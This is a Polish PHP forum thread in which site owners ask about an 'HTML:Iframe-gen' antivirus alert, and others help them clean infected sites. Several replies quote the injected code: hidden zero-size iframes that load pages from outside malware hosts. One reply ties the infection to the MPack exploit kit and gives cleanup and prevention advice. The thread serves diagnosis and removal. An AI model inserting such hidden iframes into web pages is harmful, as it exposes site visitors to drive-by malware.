Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Wirus na stronie, HTML:Iframe-gen Rozwiazne
LukasKK
post
Post #1





Grupa: Zarejestrowani
Postów: 43
Pomógł: 0
Dołączył: 20.02.2007

Ostrzeżenie: (0%)
-----


Witam,


Pracuje obecnie nad strona na której znajduje się wirus avast ostrzega mnie za każdym razem gdy strona jest odświeżona podaje nazwę pasożyta: HTML:Iframe-gen prosiłem administratora serwera o przeskanowanie antywirusowe jednak nie przyniosło to żadnych efektów gdzie szukać robala?? aaevil.gif

P.S.
Nie wiem czy w dobrym dziele umieściłem post dry.gif

Ten post edytował LukasKK 26.03.2008, 12:38:52
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi (1 - 14)
crackcomm
post
Post #2





Grupa: Zarejestrowani
Postów: 184
Pomógł: 6
Dołączył: 23.02.2008
Skąd: Katowice

Ostrzeżenie: (0%)
-----


szukać w avaśćie tongue.gifP
usuń avasta to niedawmo zaczęło GGT wykrywać, jak jeszcze nie wykrywa ^^


--------------------
Sygnaturka comes here.
Go to the top of the page
+Quote Post
carbolymer
post
Post #3





Grupa: Zarejestrowani
Postów: 102
Pomógł: 12
Dołączył: 27.01.2007
Skąd: north              Poziom: 158                     Tytuł: Miszcz

Ostrzeżenie: (0%)
-----


1. Nie ten dział
2. Masz jakieś Iframe lub inne ramki na stronie? Jeżeli tak to zobacz czy nie ma tam pętli wstawiającej ramkę w ramce do ramki w ramce, która jest w ramce... Jeżeli nie, to zobacz czy czasem reklamy / inne skrypty nie wstawiają ci różnych "gratisów" w postaci ramek. Zmień antywirus :]


--------------------
Blog | plugin system by carbolymer
Residence: #php.pl @ IRCNet
"Pralki powstały po to, aby kobiety też mogły programować"
Go to the top of the page
+Quote Post
domis86
post
Post #4





Grupa: Zarejestrowani
Postów: 255
Pomógł: 5
Dołączył: 20.03.2007
Skąd: Kraków

Ostrzeżenie: (30%)
XX---


filtruj dane wejsciowe, filtruj dane wejsciowe i jeszcze raz: filtruj dane wejsciowe
Go to the top of the page
+Quote Post
Blackhole
post
Post #5





Grupa: Zarejestrowani
Postów: 283
Pomógł: 1
Dołączył: 15.11.2004
Skąd: Mikołów

Ostrzeżenie: (0%)
-----


Hej! Ja nie używam żadnych ramek i nie używam skryptów, które wstawiałyby jakieś "gratisy" a mimo to, też "mam" tego durnego wirusa. Co z tym zrobić? http://spchkatowice.ovh.org/


--------------------
Ściskam prawicę...
Jacek

http://doscniewoli.pl/ - wszyscy jesteśmy niewolnikami bankierów!
http://jezusimarlena.ovh.org/
YouTube - Egzorcyzmy Anneliese Michel
Go to the top of the page
+Quote Post
erix
post
Post #6





Grupa: Moderatorzy
Postów: 15 467
Pomógł: 1451
Dołączył: 25.04.2005
Skąd: Szczebrzeszyn/Rzeszów




Kod
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Musisz mieć gdzieś dziurę w skryptach albo słabe hasło na ftp.


--------------------

ZCE :: Pisząc PW załączaj LINK DO TEMATU i TYLKO w sprawach moderacji :: jakiś błąd - a TREŚĆ BŁĘDU? :: nie ponaglaj z odpowiedzią via PW!
Go to the top of the page
+Quote Post
l0ud
post
Post #7





Grupa: Zarejestrowani
Postów: 1 387
Pomógł: 273
Dołączył: 18.02.2008

Ostrzeżenie: (0%)
-----


  1. <iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Usunąć to z końca strony. Pewnie coś się dopisało do indexa.


--------------------
XMPP: l0ud@chrome.pl
Go to the top of the page
+Quote Post
Blackhole
post
Post #8





Grupa: Zarejestrowani
Postów: 283
Pomógł: 1
Dołączył: 15.11.2004
Skąd: Mikołów

Ostrzeżenie: (0%)
-----


Dzięki Wam wielkie smile.gif Bardzo się zdziwiłem, że coś się mogło dopisać do mojego index.php blinksmiley.gif


--------------------
Ściskam prawicę...
Jacek

http://doscniewoli.pl/ - wszyscy jesteśmy niewolnikami bankierów!
http://jezusimarlena.ovh.org/
YouTube - Egzorcyzmy Anneliese Michel
Go to the top of the page
+Quote Post
Daro786
post
Post #9





Grupa: Zarejestrowani
Postów: 5
Pomógł: 0
Dołączył: 22.06.2009

Ostrzeżenie: (0%)
-----


Mam podobny problem, POMOCY bardzo proszę!!!!!!! Szukam osoby ktora sie zna na extreme fushion - PHP.

Prosze o pomoc. Mam jakis wirus ifreme czy cos nie mam pojecia jak go wywalic prosze o pomoc. Jestem słaby z tego wiec bede wdzieczny jesli ktos sie zglosi zeby mi pomoc. Moja strona to http://sunstacja.pl/

Moje gg 4993847, grom8@op.pl
Go to the top of the page
+Quote Post
Spawnm
post
Post #10





Grupa: Moderatorzy
Postów: 4 069
Pomógł: 497
Dołączył: 11.05.2007
Skąd: Warszawa




dajesz linka abyśmy tam wchodzili gdyż masz wirusa, tak?

zmień dane do ftp, wywal totalcomandera, wywal iframy z indexów . tyle.
Go to the top of the page
+Quote Post
zeulus
post
Post #11





Grupa: Zarejestrowani
Postów: 25
Pomógł: 3
Dołączył: 17.05.2004
Skąd: Nowhere Land

Ostrzeżenie: (0%)
-----


A propos tego wirusa atakującego poprzez dopisywanie kodu do stron .php i .htm(l) - najprawdopodobniej zaatakował Was fajny skrypcik Rosjan - MPack - na jego temat można poczytać sobie w kilku miejscach:
http://en.wikipedia.org/wiki/MPack_(software)
http://pandalabs.pandasecurity.com/archive...ered_2100_.aspx
Na tej ostatniej stronie jest link do fajnego opisu tego zestawu skryptów:
http://pandalabs.pandasecurity.com/blogs/i...05/11/MPack.pdf

Ponieważ też to przechodziłem w kilku stadiach rozwoju tego ustrojstwa na różnych serwerach, kilka porad:

1. Jak już zauważyłeś, że masz zawirusowane stronki - pierwsza rzecz - ZMIEŃ HASŁO! Ponieważ te skrypty nawiedzają skompromitowane serwery co kilka dni, czasami tygodni, im szybciej zmienisz hasło na TRUDNE do złamania, tym lepiej dla Ciebie. Nie warto poprawiać niczego w skryptach jeżeli nie zmienisz hasła, naprawdę....

2.a. Jeżeli masz najświeższą kopię serwisu, skryptów - przywróć wszystkie pliki, będzie po sprawie - tylko sprawdź najpierw, czy one też nie są zainfekowane, jeżeli jest to kopia dostawcy hostingu (jeżeli np. pliki były przez dłuższy czas zainfekowane).

2.b. Jeżeli nie masz kopii... no cóż... edytuj i płacz, szczególnie, jeżeli twój serwis ma xxx plików .html i.php... Trzeba sprawdzić wszystkie pliki które były na serwerze, wyciąć z nich kod, ZROBIĆ SOBIE BACKUP i wgrać z powrotem na serwer..

3. Jeżeli nie zmieniłeś hasła na serwerze, poczekaj dwa dni i wróć do punktu 2a lub 2b, bo przecież 1. jest zbyt trudny do wykonania...

Zapobieganie:
- ustawienie _dobrych_ haseł do serwerów, np. mietek123 nie jest zbyt dobrym rozwiązaniem..
- BACKUP, backup, backup, backup....
- sprawdzenie sobie komputera pod kątem trojanów, wirusów, rootkitów.. -> szczególnie jeżeli hasło do ftp nie było słownikowe i jeżeli masz Windows

Ustrojstwo dopisuje się w dwóch miejscach - w okolicach tagu <body> lub gdy go nie znajdzie to na końcu pliku.
Pewnym rozwiązaniem (tymczasowym) jest taki trick w skryptach php: wyświetlenie tagu body podzielonego na kawałki, np.
  1. <?php
  2. echo "<b"; echo "ody"; echo ">";
  3. ?>

wtedy nie zostanie to rozpoznane;
na dopisywanie się na końcu pliku jest sposób, ale do jednego dopisania działa - zostawienie komentarza na końcu pliku:

  1. <?php
  2. {twój skrypt...}
  3. //
  4. ?>


Przy czym ostatnia linia nie powinna kończyć się znakiem nowej lini.. Skrypt dopisze się za komentarzem, co nie rozwali całej strony, gdy w kodzie php nagle znajdzie się kod html+javascript..

Jak wspomniałem, metoda ta działa tylko jeden raz, bo skrypt dopisuje też czasami \n ...

JESZCZE JEDNO:
Jeżeli nie umiesz zlokalizować iframek i zainfekowanych plików, lub np. Kaspersky wyrzuca komunikat, że jest zainfekowany plik, który nie istnieje fizycznie na serwerze -> przyczyną najprawdopodobniej są zainfekowane strony błędów serwowane przez Apache -> trzeba sprawdzić wszystkie strony 404, 500 itp.

Powodzenia! :)
Go to the top of the page
+Quote Post
Spawnm
post
Post #12





Grupa: Moderatorzy
Postów: 4 069
Pomógł: 497
Dołączył: 11.05.2007
Skąd: Warszawa




iframy są dopisywane tylko w index , więc bez przesady winksmiley.jpg
Go to the top of the page
+Quote Post
Daro786
post
Post #13





Grupa: Zarejestrowani
Postów: 5
Pomógł: 0
Dołączył: 22.06.2009

Ostrzeżenie: (0%)
-----


Niestety nie znam się na tym za bardzo, mógłby mi to zrobić nieodpłatnie?? Podejrzeewam że to nie zajmuje dużo czasu. Sory za podanie strony masz racje, NIE WCHODŹCIE NA NIĄ póki jest zaifekowana

Pomożecie?? Udziele wszelkich informacji. Moje gg 4993847
Go to the top of the page
+Quote Post
PawelC
post
Post #14





Grupa: Zarejestrowani
Postów: 1 173
Pomógł: 121
Dołączył: 24.09.2007
Skąd: Toruń

Ostrzeżenie: (0%)
-----


Tutaj napisałem co i jak trzeba zrobić: http://forum.php.pl/index.php?showtopic=11...mp;#entry598818
Musisz usunąć taki kod:
Kod
<iframe src="http://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe>

Są rózne modyfikacje jego, i różne adresy, ale zawsze zaczyna się od iframe

Ten post edytował ExPlOiT 22.06.2009, 14:51:08
Go to the top of the page
+Quote Post
erix
post
Post #15





Grupa: Moderatorzy
Postów: 15 467
Pomógł: 1451
Dołączył: 25.04.2005
Skąd: Szczebrzeszyn/Rzeszów




Cytat
Pomożecie?? Udziele wszelkich informacji.

Załóż wątek na giełdzie ofert, nie przesadzaj, nie potrzebujemy kolejnego bałaganu.


--------------------

ZCE :: Pisząc PW załączaj LINK DO TEMATU i TYLKO w sprawach moderacji :: jakiś błąd - a TREŚĆ BŁĘDU? :: nie ponaglaj z odpowiedzią via PW!
Go to the top of the page
+Quote Post

Closed TopicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 19.08.2025 - 05:20